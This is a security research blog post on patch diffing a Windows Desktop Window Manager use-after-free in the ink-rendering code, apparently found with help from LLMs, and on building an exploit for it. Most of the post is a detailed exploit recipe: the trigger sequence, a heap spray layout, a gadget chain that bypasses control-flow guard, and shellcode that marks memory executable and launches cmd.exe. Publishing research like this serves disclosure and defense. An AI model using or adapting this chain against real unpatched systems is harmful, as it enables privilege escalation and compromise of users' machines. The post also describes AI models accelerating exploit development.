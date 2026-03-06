Joe Desimone

Patch diff to SYSTEM

Leveraging LLMs and patch diffing, this research details a Use-After-Free vulnerability in Windows DWM, demonstrating a reliable exploit that achieves escalation from low-privileged user permissions to SYSTEM.

Intro

Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen proved that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.

The Hunt

When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities, and (hopefully) develop a working exploit for it. Top on the target list were any vulnerabilities already known to be exploited in the wild. January patches included an in-the-wild information leak vulnerability in Desktop Window Manager (DWM), which caught my eye. It also included a second DWM vulnerability which could lead to local privilege escalation. Historically, DWM has been a popular target for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.

After training Ghidra on the files and extracting BSim vectors for every function, it becomes quite easy to highlight the differences between them. Not to mention, many Microsoft-patched vulnerabilities come alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.

  dwmcore_vuln.dll                      dwmcore_patched.dll                        Sim  Jaccard
  FUN_1802e7842                         FUN_1802e7842                           0.1191   0.0632
  FUN_1802e92d6                         FUN_1802e92d6                           0.1470   0.0722
  FUN_1802e5faa                         FUN_1802e5faa                           0.1741   0.0769
  ~CDelegatedInkCanvas                  ~CDelegatedInkCanvas                    0.7556   0.6047
  GetBufferedOutputTransformed          GetBufferedOutputTransformed            0.7628   0.6154
  FrameStarted                          FrameStarted                            0.7833   0.6429
  ~CSynchronousSuperWetInk              ~CSynchronousSuperWetInk                0.8018   0.6667
  FUN_1802f5aa2                         FUN_1802f5aa2                           0.9127   0.8393
  FUN_1802f57d2                         FUN_1802f5d72                           0.9127   0.8393
From here, I have to say that the time to build a functional exploit was painfully slower than I would have hoped. I spent many long nights and weekends poking and prodding the model along. A lot of this came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail and get RCE from low privilege into DWM and to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. However, with these techniques (and some other tooling) in hand and newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to functional exploit dropped from 3 weeks to a matter of hours.

The Bug

The vulnerability is a Use-After-Free in CSynchronousSuperWetInk::~CSynchronousSuperWetInk. The destructor conditionally removes the object from CSuperWetInkManager based on the return value of IsSuperWetCompatible().

void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    this->vtable = &_vftable_;
    bool bVar2 = IsSuperWetCompatible(this);
    if (bVar2) {
        CSuperWetInkManager::RemoveSource(this->composition->superWetInkManager, this);
    }
    // ... cleanup continues
}

The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.

IsSuperWetCompatible Condition

bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) {
    if ((this->LookupMode == 2 || this->notifier1 != NULL) &&
        this->clipEntry != NULL && this->comObject != NULL) {
        return true;
    }
    return false;
}

The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.

The function returns true only when LookupMode equals 2, or notifier1 is set, AND both clipEntry and comObject are non-null.

The Bug

An attacker can:

  1. Register a CSynchronousSuperWetInk with the manager (requires LookupMode=2 during Draw())
  2. Change LookupMode to 0 via CMD_SET_PROPERTY
  3. Trigger destruction via CMD_RELEASE_RESOURCE
  4. IsSuperWetCompatible() returns FALSE → RemoveSource() is skipped
  5. A dangling pointer remains in CSuperWetInkManager::localStrokesVector

When DWM later iterates this vector (e.g., in DirtyActiveInk), it dereferences the freed object's vtable, leading to controlled code execution.

The Fix

The patch adds a feature flag (Feature_1732988217). When enabled, RemoveSource() is called unconditionally, regardless of IsSuperWetCompatible(). This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.

void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    *(undefined ***)this = &_vftable_;
    bool bVar2 = wil::details::FeatureImpl<Feature_1732988217>::__private_IsEnabled(&impl);
    if (!bVar2) {
        bVar2 = IsSuperWetCompatible(this);
        if (!bVar2) goto LAB_1802a9b1a;  // Skip RemoveSource only if feature disabled AND !compatible
    }
    CSuperWetInkManager::RemoveSource(..., this);
LAB_1802a9b1a:
    // ... cleanup continues
}

The fixed destructor in dwmcore.dll version 10.0.26100.7623.

The Exploit

The UAF can be triggered from a regular user-mode application via the DirectComposition API. The attack requires no special privileges.

Prerequisites

  1. D3D11/DXGI Infrastructure: Create a D3D11 device with BGRA support and a swap chain for a visible window.
  2. DirectComposition Device: Initialize via DCompositionCreateDevice() with the DXGI device.
  3. NtDComposition Syscall Access: Hook or directly call NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel via win32u.dll to inject raw batch buffer commands.

Trigger Sequence

Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)

Query IDCompositionInkTrailDevice from the DirectComposition device, then call CreateDelegatedInkTrailForSwapChain() or CreateDelegatedInkTrail(). This allocates a CSynchronousSuperWetInk object (resource type 0xa8) in dwm.exe's heap.

Step 2: Create Visual and Set LookupMode=2

Inject batch buffer commands to:

  1. Create a CSuperWetInkVisual (type 0xa5) with CMD_CREATE_RESOURCE (0x02)
  2. Connect visual to ink source: CMD_SET_REFERENCE (0x10) with propId 0x34
  3. Set LookupMode=2 on the ink source via CMD_SET_PROPERTY (0x0B) with propId 10
  4. Connect to composition tree: CMD_SET_REFERENCE to handles 1 and 2 (composition target / marshaler) with propId 0x34

LookupMode=2 ensures IsSuperWetCompatible() returns TRUE during Draw(), which registers the object with CSuperWetInkManager::localStrokesVector.

Step 3: Render Frames to Register with Manager

Present multiple frames (IDXGISwapChain::Present) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the CSynchronousSuperWetInk pointer in the manager's internal vector.

Step 4: Set LookupMode=0 (Bypass Removal Check)

Inject CMD_SET_PROPERTY to change LookupMode to 0. Now IsSuperWetCompatible() will return FALSE because:

if ((this->LookupMode == 2 || this->notifier1 != NULL) && ...)

With LookupMode = 0 and no notifier, the first condition fails.

Step 5: Release Ink Trail (Create Dangling Pointer)

  1. Disconnect visual references: CMD_SET_REFERENCE with refHandle=0 for all connections
  2. Release the IDCompositionDelegatedInkTrail interface

When the destructor ~CSynchronousSuperWetInk runs:

  • It calls IsSuperWetCompatible() which returns FALSE (LookupMode=0)
  • RemoveSource() is SKIPPED
  • The object is freed but its pointer remains in CSuperWetInkManager::localStrokesVector

Step 6: Trigger DirtyActiveInk (Use-After-Free)

Continue presenting frames and invalidating the window. DWM's composition loop calls CSuperWetInkManager::DirtyActiveInk(), which iterates localStrokesVector and dereferences the dangling pointer:

pcVar2 = *(code **)((longlong)((CResource *)*puVar4)->vtable + 0x50);

Crash Behavior

Without a heap spray, DWM crashes when accessing freed memory:

 # Call Site
00 ntdll!KiUserExceptionDispatch
01 0x00007ffe`f23270d1
02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae
03 dwmcore!CComposition::PreRender+0x99f
04 dwmcore!CComposition::ProcessComposition+0x1d7
05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a

If the freed memory is reclaimed by another object (e.g., CInteractionTrackerScaleAnimation), the crash occurs at an unexpected vtable:

kd> dps rcx
00000201`fbef65f0  00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24

By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at vtable+0x50.

Heap Spray

To exploit the UAF, we must reclaim the freed CSynchronousSuperWetInk allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.

Target Object Properties

PropertyValue
ObjectCSynchronousSuperWetInk
Size0x120 (288 bytes)
AllocatorDefaultHeap::AllocClearGetProcessHeap()
LFH Bucket34 (273-288 byte range)
Slots per Subsegment57

Spray Primitive: CRegionGeometry RECT Buffer

The spray uses CRegionGeometry resources (type 0x81) with RECT array data:

PropertyValue
Resource Type0x81 (CRegionGeometry)
Spray Size18 RECTs × 16 bytes = 288 bytes
Allocatorstd::_Allocate<16>HeapAlloc(GetProcessHeap(), 0, 288)
LFH Bucket34, same as target
Content Control72 int32 values (18 RECTs × 4 fields)

Allocation Chain:

dcomp.dll:   SetRectangles → ResourceSetBufferPropertyCustomWrite
win32kbase:  CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy
dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range
             → std::_Allocate<16> → HeapAlloc(GetProcessHeap(), 0, 288)

The RECT buffer is written via CMD_SET_BUFFER_PROPERTY (0x0F) with propId 5:

struct CmdSetResourceBufferProperty {
    uint32_t cmdId;      // 0x0F
    uint32_t handle;     // Resource handle
    uint32_t propId;     // 5 for RECT array
    uint32_t dataSize;   // 288 for 18 RECTs
    // Variable-length RECT data follows (4-byte aligned)
};

RECT Layout for Fake Object

The 18 RECTs (288 bytes) provide full control over the reclaimed memory:

struct SprayRECT {
    int32_t left;    // +0x00 within RECT
    int32_t top;     // +0x04
    int32_t right;   // +0x08
    int32_t bottom;  // +0x0C
};
// Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields

// Key offsets for exploit:
// +0x00: fake vtable pointer (RECT[0].left/top)

Helper to write 64-bit values into adjacent RECT fields:

static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) {
    *lo = (int32_t)(val & 0xFFFFFFFF);
    *hi = (int32_t)(val >> 32);
}

Exploitation Primitive

The UAF gives us a controlled vtable call with RCX pointing to our sprayed object. When DirtyActiveInk iterates the dangling pointer:

pcVar2 = *(code **)((longlong)((CResource *)*puVar4)->vtable + 0x50);
(*pcVar2)();  // call [[spray]+0x50] with RCX = spray

Call site stack:

00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9
01 dwmcore!CComposition::PreRender+0x99f
02 dwmcore!CComposition::ProcessComposition+0x1d7
03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
04 dwmcore!CConnection::RunCompositionThread+0x142
05 KERNEL32!BaseThreadInitThunk+0x17
06 ntdll!RtlUserThreadStart+0x2c

Register state at dispatch:

  • RCX = pointer to sprayed object (our controlled 288 bytes)
  • RIP = [[spray]+0x50] (function pointer from fake vtable)

Target Function Constraints

There are initially two restrictions on what we can call:

  1. The target must be in the CFG bitmap (marked as valid call target)
  2. The target must have a pointer to it (in IAT, vtable, or other readable memory)

We cannot directly call arbitrary addresses; only functions that satisfy both conditions.

Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect

With the UAF giving us a controlled vtable call (RIP = [[spray]+0x50], RCX = spray), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems to achieve code execution, but it required 2 successful exploit attempts, lowering the reliability. Therefore, we pivoted to a known public technique using two Windows system DLL gadgets: __fnINSTRING (user32.dll) and CStdAsyncStubBuffer2_Disconnect (combase.dll).

Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak

The Windows kernel communicates back to user mode through the KernelCallbackTable (KCT), a function pointer table stored in the PEB at offset +0x58. Each entry points to a __fn* handler in user32.dll. These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.

We point the fake vtable at &KCT[fnINSTRING_index] - 0x50. When DirtyActiveInk dereferences [[spray]+0x50], it reads the KCT entry and dispatches to __fnINSTRING:

[[spray]+0x50]
  = [KCT_entry_addr - 0x50 + 0x50]
  = [KCT_entry_addr]
  = &__fnINSTRING

What makes this useful is what __fnINSTRING does internally. It treats its argument (our spray buffer) as a _CAPTUREBUF structure and calls FixupCallbackPointers before dispatching the inner function. FixupCallbackPointers reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:

// Simplified FixupCallbackPointers logic:
void FixupCallbackPointers(_CAPTUREBUF* buf) {
    if (buf->guard != 0) return;  // already fixed up - skip
    int32_t* fixups = (int32_t*)((char*)buf + buf->fixupTableOffset);
    for (int i = 0; i < buf->fixupCount; i++) {
        int32_t* target = (int32_t*)((char*)buf + fixups[i]);
        *(uint64_t*)target += (uint64_t)buf;  // relative → absolute
    }
}

This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and FixupCallbackPointers patches them to absolute pointers at runtime using the buffer's own address. After fixup, __fnINSTRING dispatches the inner function pointer at +0x48 with the arguments at +0x28 (RCX), +0x30 (EDX), +0x38 (R8), and +0x50 (R9).

We set the inner function to CStdAsyncStubBuffer2_Disconnect.

Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls

CStdAsyncStubBuffer2_Disconnect is exported from combase.dll, making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:

; CStdAsyncStubBuffer2_Disconnect (simplified)
MOV  RBX, RCX             ; save this
MOV  RCX, [RCX-8]         ; load [this-8] -> fake_obj_1
TEST RCX, RCX
JZ   skip1
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x20]      ; vtable[4]
CALL guard_dispatch_icall  ; CALL #1: [[this-8]+0x20]  ← VirtualProtect

skip1:
XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; DEFUSE: read [this+0x10], zero it
TEST RCX, RCX
JZ   skip2
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x10]      ; vtable[2]
CALL guard_dispatch_icall  ; CALL #2: [[[this+0x10]]+0x10]  ← shellcode

skip2:
ADD  RSP, 0x20
POP  RBX
RET

RDX, R8, and R9 are preserved through both calls, arriving untouched from __fnINSTRING's argument setup. This gives us full control over the first three arguments to both vtable calls.

Vtable Call #1: VirtualProtect → RWX

We construct a self-referential fake object at +0xC8 in the spray buffer: [+0xC8] points to itself (after fixup), so dereferencing [RCX] → [RCX+0x20] reads VirtualProtect's address from +0xE8. The arguments (preserved from __fnINSTRING dispatch) are:

RegisterValuePurpose
RCXbase+0xC8 (fake_obj_1)lpAddress (start of spray buffer region)
RDX0x1000dwSize
R80x40flNewProtect (PAGE_EXECUTE_READWRITE)
R9base+0xC0lpflOldProtect (output slot in spray buffer)

After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.

Vtable Call #2: Inline Shellcode

After VirtualProtect returns, Disconnect loads [this+0x10] into RCX for the second vtable dispatch:

XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; RCX = [base+0x90] = base+0xA0 (fake_obj_2)
TEST RCX, RCX
JZ   skip2                 ; non-zero → take the call
MOV  RAX, [RCX]            ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2)
MOV  RAX, [RAX+0x10]       ; RAX = [base+0xB8] = base+0xD0 (shellcode!)
CALL guard_dispatch_icall   ; call base+0xD0

The pointer chain resolves step by step:

  1. [this+0x10] = [base+0x90] = base+0xA0 (fake_obj_2)
  2. [RCX] = [base+0xA0] = base+0xA8, fake_obj_2's vtable pointer (after fixup)
  3. [RAX+0x10] = [base+0xB8] = base+0xD0, vtable_2's third entry, pointing at our shellcode

The final CALL guard_dispatch_icall dispatches to base+0xD0, our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.

Shellcode Layout

The shellcode is split into two phases because the VirtualProtect address data sits at +0xE8 (used as vtable_1[0x20] by call #1), creating a gap in the middle of our executable region:

Phase 1 (+0xD0, 22 bytes): Saves RCX (base+0xA0) into RBX for later address arithmetic, allocates shadow space, loads SW_SHOW (5) into RDX, loads the absolute address of WinExec via movabs RAX, then jumps over the 8-byte data gap at +0xE8:

mov  rbx, rcx              ; save base+0xA0 for address math
sub  rsp, 0x28             ; shadow space
push 5
pop  rdx                   ; uCmdShow = SW_SHOW
movabs rax, <WinExec addr> ; 10-byte immediate load
jmp  +0x0A                 ; skip over +0xE8 data → land at +0xF0

Phase 2 (+0xF0): Calls WinExec with a RIP-relative pointer to the "cmd.exe\0" string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:

lea  rcx, [rip+0x22]      ; rcx = &"cmd.exe"
call rax                   ; WinExec("cmd.exe", SW_SHOW)

; Defuse: rewrite fake vtable so re-entry is harmless
lea  rax, [rbx+0x78]       ; rax = address of the ret below
mov  [rbx-0x48], rax       ; [base+0x58] = ret_gadget
lea  rax, [rbx-0x98]       ; rax = base+0x08
mov  [rbx-0xA0], rax       ; [base+0x00] = base+0x08 (new fake vtable)

; Stack fixup: skip Disconnect + __fnINSTRING return frames
add  rsp, 0xB8             ; 0x28 shadow + 0x90 to unwind past intermediate frames
xor  eax, eax              ; zero return value
ret                        ; return directly to DWM composition loop
; "cmd.exe\0" embedded here

The add rsp, 0xB8 improves reliability. A naive add rsp, 0x28 would return into CStdAsyncStubBuffer2_Disconnect, which would then return into __fnINSTRING, which calls NtCallbackReturn. This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra 0x90 to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to DirtyActiveInk's caller in the DWM composition loop.

Safe Re-entry: Defusing the Spray

DWM's DirtyActiveInk may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:

  1. [base+0x00] is overwritten to base+0x08 (new fake vtable)
  2. [base+0x58] is overwritten to the address of a ret instruction

On re-entry: [[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret. The vtable call returns immediately. __fnINSTRING is never re-invoked because the vtable no longer points at the KCT entry.

Complete Spray Layout

The full 288-byte spray buffer (18 RECTs) after FixupCallbackPointers:

OffsetSizeContentPurpose
+0x008KCT_entry - 0x50Fake vtable → __fnINSTRING
+0x0848Fixup count
+0x1840x58Fixup table offset
+0x208base (fixup'd)Guard (blocks re-fixup)
+0x288base+0x80 (fixup'd)RCX → Disconnect this
+0x3040x1000EDX → VirtualProtect dwSize
+0x3880x40R8 → PAGE_EXECUTE_READWRITE
+0x488&DisconnectInner function pointer
+0x508base+0xC0 (fixup'd)R9 → lpflOldProtect
+0x5832fixup table (8 entries)Offsets to patch
+0x788base+0xC8 (fixup'd)[this-8] → fake_obj_1
+0x808(unused)Disconnect this base
+0x908base+0xA0 (fixup'd)[this+0x10] → fake_obj_2
+0xA08base+0xA8 (fixup'd)fake_obj_2 vtable
+0xB88base+0xD0 (fixup'd)vtable_2[0x10] → shellcode
+0xC04(output)VirtualProtect lpflOldProtect
+0xC88base+0xC8 (fixup'd)Self-referential vtable (fake_obj_1)
+0xD022shellcode phase 1Save regs, load WinExec, jmp
+0xE88&VirtualProtectvtable_1[0x20] data
+0xF048shellcode phase 2WinExec + defuse + stack fixup + "cmd.exe\0"

Full Chain Summary

DirtyActiveInk iterates dangling pointer
  → [[spray+0x00]+0x50] = __fnINSTRING(spray)
    → FixupCallbackPointers: 8 relative offsets → absolute
    → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0)
      → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0)
        → Spray buffer page is now RWX, CFG bitmap updated
      → Vtable call #2: shellcode at base+0xD0
        → WinExec("cmd.exe", SW_SHOW)
        → Defuse: rewrite vtable for safe re-entry
        → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames
      → RET directly to DWM composition loop
    → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return

The DWM process runs as the DWM user with System integrity. Prior public techniques to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but are choosing to withhold publishing the technique at this time.

Closing Thoughts

The models we have today are highly capable at tasks that historically have required deep expertise cultivated over many years. This includes things like reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky, and do not yet rival the world's best in these fields. However, the march of model progress seems to show no sign of slowing down at the moment. This levels the playing field for defenders, but also raises the capabilities of attackers. While there has always been an adversarial cat and mouse game, and this is not new in that regard, attackers are at least at a near-term asymmetric advantage to wield these tools for harm. Attackers can move faster, with little worry about safety or security of AI systems. Defenders must leverage AI for offensive purposes against their code (for vulnerabilities), security products (for detection gaps), and their enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do. Unfortunately, it may be the small organizations with no security teams that take the brunt of the near term pain. My hope is that long-term, the security community can together outspend attackers on offensive and defensive research, and we exit this era in a better place than we started.

